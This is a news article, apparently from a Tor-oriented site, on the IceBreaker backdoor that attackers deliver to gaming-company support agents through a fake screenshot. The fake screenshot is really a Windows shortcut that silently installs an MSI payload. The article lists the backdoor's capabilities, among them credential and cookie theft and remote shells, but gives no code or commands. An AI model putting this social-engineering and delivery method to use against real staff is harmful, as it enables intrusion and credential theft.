BTC $63479.2080
ETH $3102.3210
BNB $553.9303
SOL $138.6944
stETH $3095.0573
XRP $0.4977
DOGE $0.1616
TON $6.5573
ADA $0.4609
AVAX $35.1800
wstETH $3604.0886
WBTC $63444.7835
TRX $0.1115
WETH $3097.1785
BCH $508.1534
DOT $6.7139
LINK $13.5848
MATIC $0.7078
UNI $7.2517
LTC $78.0969
ICP $12.3388
DAI $0.9999
CAKE $2.7613
RNDR $8.2936
FDUSD $0.9976
IMX $1.9531
ETC $26.4901
STX $2.5389
MNT $1.1217
TAO $525.3353
OKB $57.6303
FIL $6.0159
NEAR $5.2270
VET $0.0414
MKR $3079.1039
HBAR $0.0795
KAS $0.1206
WIF $2.7619
ATOM $8.1379
GRT $0.2535
CORE $2.6998
USDE $0.9998
XMR $123.1697
FET $2.0557
INJ $24.4523
XLM $0.1076
PEPE $0.0000
BTC $63479.2080
ETH $3102.3210
BNB $553.9303
SOL $138.6944
stETH $3095.0573
XRP $0.4977
DOGE $0.1616
TON $6.5573
ADA $0.4609
AVAX $35.1800
wstETH $3604.0886
WBTC $63444.7835
TRX $0.1115
WETH $3097.1785
BCH $508.1534
DOT $6.7139
LINK $13.5848
MATIC $0.7078
UNI $7.2517
LTC $78.0969
ICP $12.3388
DAI $0.9999
CAKE $2.7613
RNDR $8.2936
FDUSD $0.9976
IMX $1.9531
ETC $26.4901
STX $2.5389
MNT $1.1217
TAO $525.3353
OKB $57.6303
FIL $6.0159
NEAR $5.2270
VET $0.0414
MKR $3079.1039
HBAR $0.0795
KAS $0.1206
WIF $2.7619
ATOM $8.1379
GRT $0.2535
CORE $2.6998
USDE $0.9998
XMR $123.1697
FET $2.0557
INJ $24.4523
XLM $0.1076
PEPE $0.0000
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Hackers Use New IceBreaker Malware to Hack Gaming Companies


    Once again, social engineering is in demand, this time the attackers are fooling support agents.

    Hacker groups have targeted online game development companies with a never-before-seen backdoor that the researchers have dubbed "IceBreaker".

    The Security Joes Incident Response team believes that the IceBreaker backdoor uses "a very specific social engineering technique." The method is based on deceiving support agents. An attacker pretends to be a user who has encountered a problem and sends a malicious screenshot to an employee in a chat. Tom has no choice but to download and open the file, because you need to help the user. This is how the support agent infects his computer with a virus.

    The name of the group behind these attacks is still unknown. However, according to Security Joes, this group has been using this approach since at least September 2022. At the same time, the only public evidence of the use of IceBreaker is a Twitter post from MalwareHunterTeam in October.

    The malicious image is usually hosted on a fake website that pretends to be one of the popular hosts. Although the researchers also saw that the malicious screenshots were stored in the normal Dropbox storage.

    The "image" itself is actually a malicious ".lnk" file. In fact, this is a regular Windows shortcut with malicious code in its parameters.


    As you can see in the image above, the shortcut icon has been changed to look innocuous. The shortcut contains a command to download the payload in ".msi" format from the attacker's server, install it silently, and run it without a user interface.

    Further along the path “AppData\Local\Temp”, the malicious application “Port.exe”, a 64-bit C++ executable file, is extracted.


    After careful analysis, Security Joes found out that the sample is a completely new backdoor written in Node.js. It provides attackers with the following options:

    setting up a backdoor using plugins that extend its built-in functions;
    prescribing a backdoor to Windows startup;
    Windows process detection;
    stealing passwords and cookies from local storage, in particular from Google Chrome;
    enable Socks5 reverse proxy;
    uploading files to a remote server via web sockets;
    running custom VBS scripts;
    creating screenshots;
    creating remote shell sessions.

    If the target organization has not outsourced the customer support service to an external provider, but does it itself, attackers can use the backdoor to steal credentials, move in the internal network and expand their presence in it.

    Currently, not much is known about IceBreaker, but Security Joes decided to publish this report and share all the indicators of compromise (IoC) found to help antivirus companies learn how to identify and eliminate the threat in a timely manner.

    Author DeepWeb
    North Korea massively steals the credentials of foreign civil servants
    Hackers attacked a well-known company in the US in the field of remote access

    Comments 0

    Add comment